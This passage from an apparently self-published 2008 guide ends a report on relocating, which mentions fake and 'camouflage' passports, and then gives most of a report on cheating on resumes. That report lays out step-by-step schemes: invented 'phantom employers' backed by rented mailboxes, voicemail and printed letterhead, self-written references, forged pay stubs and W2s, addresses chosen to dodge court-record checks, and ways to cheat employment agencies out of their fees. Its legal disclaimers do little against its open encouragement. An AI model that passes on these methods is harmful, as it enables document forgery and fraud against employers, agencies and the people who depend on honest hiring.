Europe, +he decided that he would defy the US department of state by +traveling on a fake passport he purchased on the Internet. +He submitted an order with the firm that seemed to offer the best +quality product. Later that night the local cops kicked in his front +door! They even brought a dog and a DEA cop with them! Of +course they found nothing (except for a single copy of the +"Anarchists’ Handbook" which they confiscated in violation of his +constitutional rights). What ever happened to our fourth +amendment rights? It would appear that in our "New World Order" +the cops no longer need to bother with those troublesome old +search warrants. +A word to the wise: some of the online fake passport companies +are, in reality, nothing more than sting operations set up by law +enforcement. And it would be a real tragedy if an innocent person +such as yourself should fall into their trap, wouldn’t it? +Also, others are peddling stolen passports, which are even more +dangerous. If you really want to get a genuine passport that can +be used to travel the world unmolested, take a look around +Central America where several governments (including Belize, +Grenada, Dominica, Antigua and Barbuda) will provide one for a +fee. But be warned, the fee can be steep (anywhere from $15,000 +to $75,000 or more isn’t at all unusual). +© Copyright 2008, Ariza Research, All rights reserved - ABP - 252 - +Reproduction in any form is prohibited without written permission. + +If you’re only concerned about handing your US passport over to a +terrorist should you be on a hijacked plane, you might want to +contact the nice folks at Scope International. They will provide you +with a very authentic looking "camouflage" passport that appears +to be issued by an ex-country like Rhodesia, Zanzibar or British +Honduras. +Since these countries no longer exist, their passports cannot be +used for general travel but are only useful in terrorist situations. +(But you should be aware that these phony passports will only be +of value with terrorists who are ignorant on the subject of +geography.) Scope International is located in England and be +contacted at: +Scope International +P.O. Box 2286, Forestide House +Rowlands Castle, Hants, England P09 6EE +Phone: (01705) 631-751 +Some Oddball Travel Options: +Travel is always an interesting option (if you can afford the fare). +Here are some rather strange travel ideas. One might be just the +ticket you need: +You could do a Kayak tour of Canada +Ecosummer Expeditions +(604) 669-7741 +How about dog sledding in far away Greenland? +Borton Overseas +(800) 843-0602 +Some other Greenland tours +Arctic Adventure Aps +(45) (1) 37 12 33 +(Denmark) +Go sailing on a real Russian icebreaker +MIR Corporation +(800) 424-7289 +Visit nomadic and tribal people +Turtle Tours +(602) 488-3688 +© Copyright 2008, Ariza Research, All rights reserved - ABP - 253 - +Reproduction in any form is prohibited without written permission. + +Travel to Brazil and Venezuela +Wildlife Adventures +(800) 255-8735 +Ride across Alaska on a motorcycle +Alaska Motorcycle Tours +(800) 642-6877 +Drive across the Sahara Desert +Explo-Tours +(49) (89) 160-789 +Germany +Do a 15 week tour of Africa? +Himalayan Travel +(800) 225-2380 +Spend five months touring all of South America +Forum Travel International +(510) 671-2900 +Spend 37 days exploring Australia +Trans Continental Safaris +(61) (88) 423-469 +Go on a real safari in Africa? +Abercrombie & Kent +(800) 323-7308 +Touring Tanzania sounds kinda nice… +Borton Overseas +(800) 843-0602 +Float on down the Yangtze River in China +Steve Curry Expeditions +(801) 224-6797 +And now one final tactic. Once you’re established in your new +location - burn this report! If discovered by the wrong person later +on, it could make the finder wonder just what you’ve been up to +and you don’t need to face any unnecessary questions now do +you? +I hope all this has helped you to move on to a happier new life. A +lot of time and effort has gone into getting this information into +your hands. I can only hope you will take full advantage of it. Best +of luck! +© Copyright 2008, Ariza Research, All rights reserved - ABP - 254 - +Reproduction in any form is prohibited without written permission. + +The Perfect Resume +by Jim & Susan Petersen +May you live in interesting times.… +- Ancient Chinese Proverb +© Copyright 2007 – Ariza Research – All Rights Reserved - ABP +Disclaimer: +Do not break the law. This publication is being sold for academic, +educational and entertainment purposes only. Nothing in this publication +is intended to encourage illegal or immoral acts now or at any point in the +future. Securing employment through deceptive means may violate +various local and federal laws. Always consult with an attorney familiar +with laws in your local area before attempting to employ any of the +techniques discussed in this report. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 255 - +Reproduction in any form is prohibited without written permission. + +Resume Secrets +To Lie or Not to Lie? +Let me say at the outset that I cannot, in good conscience, +advocate lying or cheating in any form including on a resume. But +in our less than perfect world it sometimes becomes necessary to +massage the truth a bit in order to smooth our path and put the +wind at our backs. +In this report I’m going to give you a variety of inventive ways to +cheat on a resume. But since everyone’s situation is unique, you +alone must be the final judge of which you’re willing to use and +which you’re not. +At this point you’ve probably seen an advertisement for an open +position you may be interested in, or perhaps have been in touch +with an employment agency or headhunter and so are now ready +to submit your resume. At this early stage you have two factors to +consider. +First there’s your innate sense of morality. Since there are no laws +that specifically prohibit employing deception on a resume, in the +final analysis the only limit on your dishonesty will spring from your +own intrinsic sense of what’s right and what’s wrong. +Secondly there’s the matter of your future plans regarding this +particular target employer. If this time around your target employer +is only one of many firms in your area and you have little if any +expectation of applying to them in the future, you’re free to get as +tricky as your personal moral code allows. In this case, if your +deception should be discovered during the application process, +little will be lost. +If, on the other hand, your target employer is a large one and a +major force in your community - one that you may very well be +applying to again at some point in the future, your use of +misinformation will have to be more conservative and calculated. +Remember, one of the first questions on most employment +applications is “have you ever applied for employment with ABC, +Inc. before?” Should you “blow it” and have your deception +discovered, you’ll most likely permanently destroy any chance of +future employment there. This may be one bridge that you can’t +afford to burn. +Since there are no specific legal penalties for cheating on a +resume, almost everyone does it. One study found that over 95% +of resumes contain some degree of exaggeration, while more than +15% contained major falsehoods such as fraudulent academic +credentials or phantom employers. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 256 - +Reproduction in any form is prohibited without written permission. + +If exaggeration is so common that prospective employers +anticipate it, why should you buck the trend and limit your +prospects by being absolutely honest? +While most of us struggle to live our lives according to the golden +rule, our modern society often requires that we be less than totally +honest. Recently I got involved in a minor traffic accident. I called +a local body shop and asked if they could provide a loaner car +while my car was being repaired. They said yes. +But when I showed up the next morning I was required to sign a +rental contract that included a paragraph stating that the insurance +on the rental vehicle would be null and void if I had been involved +in an automobile accident anytime during the previous six months! +This is insane, I thought! This place is a body shop! Everyone who +rents these cars has had a recent accident! I signed the document +and drove very carefully. Such are the times in which we live. +This “mandatory dishonesty’ can be found in abundance in today’s +the job market. It’s inevitable that most Americans have +accumulated a few employment problems along the way. These +career flaws will need to be smoothed over somehow or even +completely covered up. +Another factor that should be considered is the prospective +employer’s commitment to openness and honesty. In my +experience very few employers will fully reveal any unpleasant +details affecting the positions they advertise. Perhaps your future +boss or co-workers are complete bastards. Perhaps they know +that the division you’ll be working for will soon be eliminated, or +perhaps the entire corporation is in financial trouble and will soon +be laying off large numbers of employees. +In cases like these, you can bet that the hiring corporation will +seldom let issues like fairness and morality get in their way. They +need to fill the job and get on with their business. It’s a sad fact +that corporations are seldom completely honest when it comes to +the information that an applicant needs to make an intelligent +decision about the desirability of the position. It seems very +hypocritical for a prospective employer to insist on applicants +being entirely honest while they regularly conceal relevant job +details. +Also it’s vitally important to remember that the entire application +process has to be kept entirely positive. Introduce even the +slightest bit of negative information into the process and you can +bet they’ll drop you like the proverbial hot potato. This report was +conceived and created to help job hunters thrive in this skeptical +and hypocritical employment environment. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 257 - +Reproduction in any form is prohibited without written permission. + +Before We Begin +Unlike other areas of life, when it comes to resume preparation +there are few hard and fast rules. Instead you’ll find that the few +rules that do exist are cast in shades of gray. And while it’s +certainly true that you can get away with a great deal, you need to +be aware of some pitfalls before you begin. +Should you decide to employ minor deception in the seeking of a +position, it’s unlikely that you’ll experience any future problems. +And, should you employ a moderate degree of deception and +subsequently perform well on the job, once again you’ll have few +problems. +But - should you manage to cheat your way into a job that’s clearly +over your head and later have your deception exposed, you could +find yourself in considerable legal trouble. +Remember that by inserting a major falsehood into your resume, +you’ll have to learn to live with a ticking time bomb that could go +off at any moment. If you decide that your situation warrants using +deception and are convinced that you can handle the +psychological stress that goes with living a lie, whatever you do - +keep your deception to yourself! By sharing this potentially +explosive information with anyone you’ll be handing him or her a +weapon with which they can very easily destroy you. +Before you even consider cheating on your resume, it’s also +necessary that you know exactly what sort of environment you’ll +be operating in. In the old days anyone interested in hiring you +could phone up any of your former employers and openly inquire +as to your job performance, attendance, personal habits, +personality, political affiliations, race, religion or any other factor +the caller might consider relevant. In short, your personal life was +an open book. +That was then and this is now. Today lawyers rule the world. In +the current legal environment an executive that reveals even the +most seemingly innocent shred of personal information about a +former employee may expose his firm to a multi-million dollar +lawsuit. Personnel executives are aware of this and so now +behave more like scared rabbits than captains of industry. +They know that performing a reference check today is like tap +dancing through a minefield. Happily, this paranoid atmosphere +plays right into the hands of the resume cheater. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 258 - +Reproduction in any form is prohibited without written permission. + +In one extreme case a nurse was fired from a major urban hospital +under a dark cloud of suspicion. Hospital officials there suspected +that she was performing her own “mercy killings” by unauthorized +overdosing of patients with narcotic pain killers. When she applied +at a new hospital in another state they called for a job reference. +Fearing an expensive law suit the major hospital confirmed her +employment dates, job title and chose to provide no further +information concerning her termination. The sad ending of this +story is that she landed the new job and went on with her personal +euthanasia project at her new hospital and killed another dozen +patients before she was finally arrested and jailed. This shocking +tale only goes to prove my point. +Employers are scared to death of employment references and +aren’t very eager to share notes these days. +And here is some more good news. In these times of tight +budgets, most employers are cutting back on background +investigations. +Many employers have replaced systematic background checks +with spot-checks that only check a fraction of the information on +your resume/employment application. And then they act so +amazed when someone slips something past them. +Always remember how to smoothly back out should things go +awry. Chances are that if a prospective employer smells a rat, he’ll +simply stop calling. But if he should call and confront you with +questions you’d rather not discuss, immediately inform him that +you’d like to provide him with an answer but unfortunately you’ve +just accepted a position with another company. Just back out as +gracefully as possible. There are too many less careful firms out +there to have to deal with difficult questions. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 259 - +Reproduction in any form is prohibited without written permission. + +What They Know and What They Don’t… +Before we delve into a detailed discussion of cheating techniques, +you’ll need to know exactly what a hiring executive can and can’t +find out about you. Keep in mind that all information outside of the +following parameters is fair game for exaggeration. A standard +employment reference will usually provide the following +information: +1. An employment confirmation +– Yes, he did work for us +2. The dates of employment +– The first and last days worked +3. The job title of the most recent position +occupied +Due to the oppressive legal environment in which we live, this is +where most references will end. There’s one more bit of +information an astute caller may request however – your rehire +status. Did you leave the firm on good terms – positive enough +that they would consider hiring you back at some point in the +future? About half of the firms we interviewed said they would +cooperate and provide this additional piece of information. +Given the inability of the caller to get the full story if the rehire +status comes back negative, he’ll understandably assume the +worst. As a result, a negative rehire status is therefore the +proverbial “kiss of death”. Which explains why it’s so important to +confirm your rehire status before you leave an employer. +Since anyone interested in hiring you can and will be able to +obtain your dates of employment and job title, this leaves a great +deal of room for exaggeration or, if necessary, even outright +fabrication. The specific job duties or responsibilities can be rather +freely expanded as can your former salary. You might also get +away with some minor extension of the period of employment +should you wish to cover up a gap in your employment history. +If you’re not sure exactly how one of your former employers will +respond to a reference call – call them yourself! Pose as a hiring +manager and ask for a reference on yourself and see what they +say. Whatever they say, probe them and ask for more information. +If they sing your praises or at least give you the standard positive +reference, you’re all set. But should they say anything that is at all +negative, promptly write the personnel director a personal letter. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 260 - +Reproduction in any form is prohibited without written permission. + +Say that you were disappointed to learn that they had given out a +slanderous reference that recently cost you a lucrative position. +State openly that you’re consulting with legal counsel and infer +that any further negative comments will result in immediate legal +action. It’s standard procedure in most personnel departments to +place a copy of such a letter right on top of your file so that +anyone pulling the file in the future will immediately be confronted +with your letter and will be forced to avoid any negative +comments. +Also, less background checking is being done. Corporations are +now required by federal law to use exactly the same background +checks on all applicants. (In the past it was common practice to +unfairly scrutinize minority applicants) Checking all applicants is +rather expensive these days hence the overall reduction in +investigations. +Every company we polled reported that, according to well- +established written rules, they are required to perform mandatory +employment reference checks on every single applicant. But when +we discussed the subject with a dozen hiring managers in a bar +after a few drinks, an entirely different story emerged. Every one +of them admitted that checks are often either skipped or only +partially completed. +Today’s managers live in a very rushed environment so many +managers simply can’t find the time to place the repeated phone +calls and mail out the reference requests. They also know that +should they make a mistake during a check it could get them into +hot water so they’re more than a little intimidated. +And then there’s that certain macho attitude that they, and they +alone, can confidently extract the best employee from a crowd by +“gut feel” because they’re a such a “good judge of character” and +so have no need for further data. Several managers with +extensive hiring experience admitted that they had yet to perform +their first reference check! Just be aware that for whatever reason +– many checks never get made. +If you chose to include career accomplishments on your resume, +they must be specific. Vague or inexact accomplishments are +worthless and will certainly lead to a detailed discussion. Be +careful with accomplishments, as you must be prepared to answer +detailed questions. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 261 - +Reproduction in any form is prohibited without written permission. + +Should you indicate that your last employer is a firm right down +the road, it’s very likely that a prospective employer will go ahead +with a check. But by simply listing a firm in another state, you +somewhat reduce the odds that a prospective employer will either +actually go ahead with the check or get the reference check back +(via mail) in time to be used in making a decision regarding a job +offer. +If you provide a slightly altered address for your former employer, +the mail may go astray. If the address is a PO Box simply switch +two digits of the PO Box number. Otherwise you might try +incorrectly abbreviating the town name and also switching two +digits of the zip code. This may only serve to delay the arrival of a +reference letter, but there’s always the chance that they won’t +even bother to follow up with a second attempt. +Phantom Employer I +Say that you have a former employer on your resume that you +know for certain will not be saying nice things about you. How can +you cover up such a blemish? The most effective means is +through the use of a “phantom employer”. This is a firm that you +list as a former employer on both your resume and employment +application despite the fact that you were never actually employed +by them. +Spend an afternoon in your nearest library reading through recent +issues of the largest newspaper in town. What you’re looking for is +an article about a local firm that recently went out of business. Or +perhaps your previous employer was a company that has recently +undergone a considerable re-organization. +Or one that recently closed down a local office and pulled out of +town. This sort of company makes an ideal former employer +because they are very poor sources of information. +And at the same time you get an excellent reason for leaving the +job. What better reason could there be than having your employer +go belly up or leave town? Or if you would rather have your future +employer think that you’ve only just arrived in town, scan the +microfilms of the biggest newspaper in the town from the area of +the country you want them to think you just came from. +Or you might want to scan the obituaries in search of an executive +from a small company that recently died while still employed. This +guy will make a nifty ex-boss. He was such a nice man and would +have certainly provided you with a solid gold reference if he could. +But then dead men are extremely poor sources of information. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 262 - +Reproduction in any form is prohibited without written permission. + +When using this technique you must be sure to avoid larger firms +as they will probably have a personnel department that can and +will provide an employment reference even though your former +boss is six feet under. +And then there’s the entirely unverifiable foreign employer +approach. Every large city newspaper will contain one or more +classified ads offering jobs overseas. These firms usually sell a +compiled list of foreign positions. It may cost you a few bucks but +if you need to resort to this, it’s worth it. +Buy the list and scan the positions. You’ll probably find that the list +is quite long and usually features professional positions for +engineers, physicians or pilots. If you have the technical +qualifications you can select any job that you’re qualified for. +But if you don’t - just keep an eye out for positions for English +language teachers. These positions are usually open to anyone +with a high school diploma. Get the name of the hiring outfit +(usually the agency of a foreign government). Write down the +exact name of the agency, its director’s name and the full foreign +address. +It’s a rare employer who will even attempt to obtain a reference +from a foreign government! My favorite is the government of Saudi +Arabia. They employ thousands of Americans and I’ve never +heard of anyone securing an employment reference from them. +If you’re asked why you’re seeking a position, just tell them that +you’re eager to return to the good old USA due to an illness in the +family. It’s a common and believable story. +Covering up a Misspent Youth +If you’ve had any kind of legal problem in the courts of the county +in which you now live, do not use your current address on a +resume or employment application. Instead use an address in +another county, even an adjacent one will do. +Most companies will not take the time nor spend the money to +check your court records in the first place, but if they do they’ll be +required to pay for the search on a per county basis. For this +reason they will usually restrict their inquiry to your current county +of residence as listed on your application. By appearing to live in a +different county by either moving, using a friends mailing address, +or using the ever-handy commercial mail drop you’ll have them +looking in the wrong place. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 263 - +Reproduction in any form is prohibited without written permission. + +A quick and inexpensive way to legally establish a more +convenient new address as your official residence is to register to +vote listing a substitute address as your new address. This will get +you entered into an easily checked public-record database that +any investigator worth his salt will be checking. And being a +patriotic voting citizen will make you look like a reasonable and +responsible person. (But be aware – this may get you called up for +jury duty!) +Phantom Employer II +If you were either employed by an employer you wish you’d never +worked for or were otherwise not working for a period of less than +four months you can probably get away with simply extending the +employment periods for the previous and subsequent employers +to cover the gap. +But if you have a longer period you need to cover, more drastic +action will be required. There can be many reasons why someone +would have such a gap in their career record. Perhaps they were +ill or were in an alcohol or drug rehab program. Or perhaps they +were staying in a mental health care facility or even serving out a +sentence in a state penitentiary. Whatever the cause of the gap, +we now need to move on to one of our more advanced +techniques. +Under this approach you simply eliminate the unfortunate gap +from your resume entirely and replace it with a widely respected +international firm like IBM, AT&T, IT&T or any other international +company that has an instantly recognizable name. But how are +you going to get this new company to give you an employment +reference? This is where things get really interesting. +First find one of those commercial stores that rent post office +boxes by the month. Rent their smallest box, which should cost +you around ten to twelve bucks a month. +Ask the clerk for the street address for your new box. You won’t +be using the PO box number but will instead show the box number +as a suite number making the mailing address look just like an +everyday office street address. Your new address looks much +more legitimate and professional this way. +Be very careful when filling out the application form for your new +box. List your name and then add two additional names. First add +a common fictitious individual’s name, like “Bill Williams” and then +also add the name of the famous international firm that you will be +claiming as your ex-employer. It should be a household name that +anyone will instantly recognize as a major employer. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 264 - +Reproduction in any form is prohibited without written permission. + +If the clerk asks any questions about your “new” old employer, just +tell them that the company is your current employer. They will +readily accept this as many of their customers are traveling +executives who use their boxes for business purposes. +Then list this new former employer on your resume during the +period you wish to cover. In the future, when you fill out a job +application, list the new company as your employer for that period. +List your Manager’s name as Bill Williams (or whatever name your +came up with) and then go on to list the street address of your +new PO box as the firm’s office mailing address. If you want to go +whole hog on this deception, you could even call the nice people +at the phone company and have them set up a “stand-alone +voicemail” account. +This will give you a dedicated phone number (separate from your +home phone) where you can record a greeting which will include +the name of your new employer. You can either have a friend +record the greeting so as to avoid using your own voice, or you +may be able to choose the default computerized voice if you don’t +want to bother a friend. When they call, you can have a friend call +back and give you a positive reference or fail to respond entirely. +The really nice thing about this approach is that it accomplishes +several different goals at the same time. First you get a very +impressive former employer to list on your resume. Employers +know that large companies can afford to be very picky about who +they hire which tends to impress prospective employers. At the +same time you get to completely erase the offending firm from +your resume. +There are also some other benefits. You get to design your own +work experience which gives you a great deal of latitude in +increasing your stated job skills, job title and you’re also assured a +solid gold employment reference as the request for the reference +will be mailed directly to you! +You’ll be providing your own reference and I just know you’ll be +generous! +When the request for an employment reference arrives in your box +you’ll know that the outfit you interviewed with is seriously +checking you out. You then have two choices. You can go to a +printer, tell them that you work for this large company and ask to +have a small quantity of letterhead stationery printed up. +To avoid any delays, you should have this printing done well in +advance if you plan to return a letterhead reference. You can then +actually respond with a formal reference on yourself. This option +may cost you a few bucks for printing but is the best approach. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 265 - +Reproduction in any form is prohibited without written permission. + +Or you can do nothing. The simple fact that the letter was not +returned undelivered will make it look like it was properly received. +In this case no news is not necessarily bad news. +“Clumping” +This technique can be used to “clump” together several short-term +jobs that may or may not be related to your main career skills +under an umbrella which makes it appear that you were working in +your chosen field throughout the entire period. You can also use a +phantom employer to pass off part time work as full time. +It’s a fact that today many firms simply don’t respond to +employment reference requests on a timely basis. Each letter they +send out costs them money and doesn’t in any way benefit the +firm. And because the lawyers now run the planet, phone +references are no longer a viable option. +There have been so many lawsuits over statements made during +phone references that most personnel departments have an +official policy of banning all discussion of past employees over the +phone. Instead they require that all requests for references be +submitted by mail so that the outgoing reference letters can be +cleared through their legal department. +Whatever you do don’t attempt to cover career gaps by claiming to +have been involved in “consulting”. This ploy was a good one a +few years back but today is an overused and transparent ruse +that’s guaranteed to raise an eyebrow and lead to further +questions. +Stretch, Don’t Invent +When given the choice of either inventing a new qualification or +stretching an existing one, always choose the easier route - +stretching. Let’s say that you want to claim a college degree you +didn’t earn. If you attended a school but didn’t graduate, it’s far +better to claim a degree from that institution than from one you’ve +never even visited. At least you know the school you attended and +can intelligently discuss the campus layout, social life and some of +the instructors. +If you ever bump into someone who attended the same school +you’ll be in a much better position to handle the situation. Imagine +trying to convince a Harvard grad that you too attended Harvard +when you’ve never set foot there? They would see through you +right away and report the conversation which would almost +certainly get you quickly fired. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 266 - +Reproduction in any form is prohibited without written permission. + +Also, if you attempt to change fields you won’t know the jargon +and will quickly find yourself in trouble. If you expand your existing +qualifications and stay in the same field you’ll have a much easier +time of it. +The Creative Use of Spurious Documents +You might want to consider carrying a copy of your old resume +with you to the interview. It should be the resume you used to +obtain your current position. To be believable it should be a +slightly older copy of a typed resume, not a slick laser printed +document. This will help substantiate your work history as few job +seekers bother to have this document at their fingertips. +To help bolster your claim of having worked for a particular +company, you might also have one or two supporting documents +with you. You could use a personal computer to generate a +convincing employee ID card, or go to any of the larger office +supply stores where you can easily purchase fancy certificates like +employee of the month or a training completion certificate. +Perhaps you could look around the web where I’m sure you’ll find +several printers who sell very professional blank certificates. Or +you might want to try my personal favorite, a pad of pre-printed +performance evaluation forms with which you can embellish your +past job performance to your heart’s desire. And you’ll never have +to fear having your deception discovered as performance +evaluations are always confidential and completely unverifiable so +make an ideal way to document past employment. +Here’s a nice touch that’s very professional and guaranteed to +impress even the most jaded hiring manager. Carry a personal +thank you note with you pre-addressed to the interviewer. On your +way out of the building drop it in the mail so that it’s received +promptly the next day. +The More the Merrier +And it’s always a good tactic to apply to as many different +companies as possible. Some companies are less careful than +others. When a company is particularly eager to fill a particular +position, they may hire you on the spot. The entire employment +process will be accelerated and the normal checks ignored. It only +takes one careless firm. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 267 - +Reproduction in any form is prohibited without written permission. + +Prospective employers are much less likely to verify past +employment that occurred more than five years back. On these +older positions you can usually get away with exaggerating your +job title or duties as they are less likely to be verified. Job +experience that is not relevant to the job you’re seeking is less +interesting to a prospective employer and is also much less likely +to be verified. +Also if you choose to utilize a phantom employer, many applicants +have found that they could get away with claiming a non-existent +firm as a former employer provided the position is more than +seven or eight years ago. Phantom employers can also be used to +help them bring outdated job skills more up to date. +Need Personal References? +Most companies will insist that you list two or three personal +references. You should be aware of several common practices. +Many companies employ the rather tricky tactic of calling only the +last reference you provide. Most of us have had a friend or co- +worker call and ask that we provide a reference for them. In return +they will usually offer to provide a reference at some point in the +future. +This practice is so widespread that many hiring executives no +longer bother to check personal references. There’s no way that +they can know for sure whether they’re talking to a genuine +reference or a friend whose just posing as one. +A Short Story +I was once employed by a small manufacturing firm. Eight of us +went into work one Friday morning expecting nothing more than a +usual workday. At around 10 am we were summoned into a +meeting and informed that we were all terminated as of noon! We +were stunned but what happened next really showed me how +meaningless references can be. +All eight of us quickly filed out into the parking lot. We stood there +chatting for ten minutes or so. Then someone pulled out a pen +and a yellow legal pad. He offered to exchange either personal or +employer references with anyone in the group. +He quickly found an accomplice. He said “I’ll be Mr. Ron Mathews +and be your sales manager if you’ll be Mr. John Burns my former +office manager.” Each pair would exchange slips of paper with a +short script as to what they should say (dates of employment, job +title/duties etc.) +© Copyright 2008, Ariza Research, All rights reserved - ABP - 268 - +Reproduction in any form is prohibited without written permission. + +A half-hour later each of us drove off with three glowing personal +and a employment reference in our pockets! This little story shows +just how useless both sorts of references can be. +Telephone Madness +For a small fee the phone company will assign you a phone +number that when called will ring through to any other phone +number you designate. You can have a friend, preferably a +female, answer the phone using the company name and take the +phone number so that the call can be returned. +When asked to provide personal references on an application, +always say - “References to be provided at interview”. Have your +references along with phone numbers and addresses typed up on +a single sheet in your pocket when you march in for the interview. +Employment Agency Madness +If you’ve ever had any dealings with employment agencies you’ll +know that there is very little going on there that is anywhere near +fair. The unscrupulous ones will say that they have little or nothing +for you at this time. +However - If you’d be willing to sign a contract binding you to pay +their outrageous fees (usually a percentage of your first year’s +wage), they will open their super-secret private listing of hot, high +salary jobs that you are, of course, fully qualified for. Just sign on +the dotted line. If you don’t sign, they show you the door. +If you do sign you’ll get a job with an employer of unknown +desirability and will be saddled with heavy payments for anywhere +from several months to a year or more. What a scam they have +going on here. But let’s examine a dirty little strategy for beating +them at their own game. +If you sign the contract, they give you the phone number of a hot +prospective employer. You call and set up an interview. If you’re +hired you have to start paying those enormous fees to the +employment agency. But this is where some folks are tempted to +try and cheat the agency out of their fee. If you accept the job and +then tell the agency that the interview didn’t go well and you found +a job elsewhere, you might think that you’ll get away with not +paying the fee. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 269 - +Reproduction in any form is prohibited without written permission. + +But these sharks are way ahead of you. What they do is wait a +month or so and then call the employer and simply ask for you by +name. If the call is put through - you are busted and then they +wave the contract you signed in your face and threaten you with a +nasty law suit if you don’t fork up the entire fee immediately. +But say that you and a friend approach two different employment +agencies, sign their contracts and then just switch the references +the agencies give you - you can both get nice new jobs and +neither of you will ever have to pay a dime to the agencies that +sent you. If the agencies attempt to call a month later, they’ll come +up blank. Of course this ploy is most probably illegal so be sure to +check with an attorney familiar with laws in your area before giving +it a try. +Instant References! +Here is a slick little tactic that comes from a friend who was once +on the run from a rather vicious cult. If you find yourself in a +strange town and need a full set of quick personal references this +tactic may be just the ticket. Dress up in your best clothes and go +to church next Sunday morning. +Choose the most rabid fundamentalist Baptist church you can find. +When they give the “alter call” stroll down the isle and get down on +your knees. You’ll probably be invited to a “fellowship” meeting +afterward where you can tell them about your sad and sorry life +and how you’ve been saved by their church. +If you sound the least bit genuine, they’ll eat it up. Should they +invite you to any social functions – show up. Agree with everything +they say. In a few short weeks you will be one of them and they +will adore you. Not because of your character but instead because +you believe as they do. You’ll quickly amass more references than +you can ever use and they’ll all be from good solid church people. +Why Not To Fear Background Checks or Employment +References +First of all, background checks cost money. With all the belt +tightening that’s going on, few checks are really comprehensive +while many never get off the ground in the first place. Most +background checks done today are only cursory examinations of a +few databases done by overworked, underpaid and rushed +investigators. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 270 - +Reproduction in any form is prohibited without written permission. + +Due to the high cost of performing background checks, many +companies have been forced to cut back on the scope and depth +of their routine checking. They tend to hire investigative firms who +often do some really sloppy work. Each investigation is conducted +according to a checklist. +The investigator then signs off as each particular item is verified. +Because the investigators are so rushed, very few negatives are +being discovered. Many managers have clearly lost faith in these +investigations and have resigned themselves to relying instead on +the impression the individual creates during the personal +interview. This is what’s causing the increase in interviewing. +Also several states (Arizona for one) have passed state laws that +forbid employer “blacklisting” of former employees. This makes +providing employment references even more dangerous and +complicated as an ex-employee can always launch a law suit +claiming they were blacklisted. +One helpful tactic is to do some serious research on your target +employer. Spend some time reading up both on the company and +it’s industry. Be able to ask several intelligent questions +concerning the firm’s direction and any recent developments that +would affect it’s business. +Research has shown that less than one percent of applicants take +the time to learn about the firms they apply to. This can be a real +leg-up when you’re in a head-to-head competition with a worthy +adversary. +The Numbers Game +Armed with this information and a little creativity, you can easily +add thousands to your future income. By now you’ll no doubt have +gathered that your former employers will be providing no +information at all regarding your salary history. +Sometimes this fact can be very useful depending on the position +you occupy. Some positions have very well established and easily +identified salary ranges while other fields are much more open +which leaves more room for exaggeration. +For instance, the salary for a high school teacher with a bachelor’s +degree is very easy to determine while pegging the income of an +“administrative assistant” would prove much more difficult. If you +have the latitude, increase your salary around 5-10%. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 271 - +Reproduction in any form is prohibited without written permission. + +I’ve know several top headhunters who routinely require that each +applicant they handle swear an oath that they will never – under +any circumstances - discuss salary with a prospective employer. +Even if they pressure you to come up with a figure – don’t. +Instead force them to come up with an offer. Studies have shown +that salary numbers provided by the hiring firms are almost always +higher than those provided by prospects. Excited by the prospect +of getting a job offer, many applicants will cough up a number +that’s well below what the employer may be willing to spend. This +is why hiring firms push prospects so hard! Lose this game and +you may suffer for years and years to come. +This includes any initial response to an advertised position. Many +ads will ask that you submit your minimum acceptable salary +along with your resume. It’s obvious that they’re fishing for a +bargain. And if the number you provide is the least bit high – +whoosh – you’re instantly screened out! +This is by far the quickest and most reliable way to get yourself +eliminated from consideration. +When submitting your resume, don’t even think of actually giving +them a number. Instead just include a note that the salary will be +discussed during the interview. If your resume and cover letter are +strong enough this ploy should get you into the door. +I have to admit that the first time I heard of this tactic, I was +reluctant but went ahead and agreed to not surrender a number. +Each of three interviews went well and during the first two I was +pressured to come up with a figure. During the final interview they +began to push really hard. The interviewer declared that we would +just sit there glaring until I came up with a number. +With sweat rolling down my collar, I smiled and kept apologizing +and referring him to my headhunter. The next day he came up +with an offer that was $14,000 above the number I had in my +head! You can’t argue with success. +If your last salary was below the norm for the market, you can +always claim a somewhat higher number. If cornered, you can +claim that your former position included an annual bonus, trips or +scheduled overtime. These additional sources of income are +impossible to verify and will also tend to make you sound more +valuable. +One particularly effective means of documenting an inflated past +salary is to carry a copy of your current paycheck stub or W2 +earnings statement with you. Any larger office supply store will be +only too happy to sell you a small package of blank forms that you +can run through any computer printer you might have. +© Copyright 2008, Ariza Research, All rights reserved - ABP - 272 - +Reproduction in any form is prohibited without written permission. + +You then throw away the top copies and show your future +employer the bottom one that’s labeled “employee copy”. +Be sure that all your numbers are in line and this ploy will +definitely impress him. Fold and re-fold the thing until it looks as +though it’s been in your wallet for some months. +Always remember that it’s absolutely mandatory that you dress +the part you’re trying to play. If you claim a high salary, you should +dress like someone that would be pulling down those big bucks. If +you dress like a minimum wage worker and try and fool someone +into thinking you make seventy grand a year, you may not be +taken seriously. Nothing flashy or flamboyant just nice high quality +business clothing. +Unless you’re going after a very high-level position, or one that +deals with a sensitive security issue, you’ll find that most hiring +managers will automatically accept any documentation you +provide at face value. +Unfortunately none of the above applies when you go after a +permanent government job. The government has the resources +and the time to check you out from every angle. With them any +resume deception will eventually be discovered and exposed. +“Do Not Contact My Current Employer” +When filling out a job application, always check the little box that +requests that the prospective employer not request a reference +from your current employer. Even if you’re not, this will make you +appear more valuable as a currently employed prospect will +always be more desirable then one who is unemployed. +Hiring companies just love to think that they’re “stealing” you away +from another firm. Most of the hiring managers we spoke to +revealed that they seldom bother to follow up with an employment +reference with your last employer after you’re on their payroll. +(Though you have to consider this possibility if it’s stated on the +application) +If your resume is relatively sound and only includes some minor +modifications, you can probably land a position with most any firm. +But should your resume contain more fiction than fact, you may +want to restrict your job search to the smaller companies. Small +family owned outfits do the least checking of all. The pay and +benefits may not be the best, but they might be just the ticket if +you need employment fast and have a resume that may not +withstand the scrutiny a larger company with more resources +might apply. +© Copyright 2008, Ariza Research, All 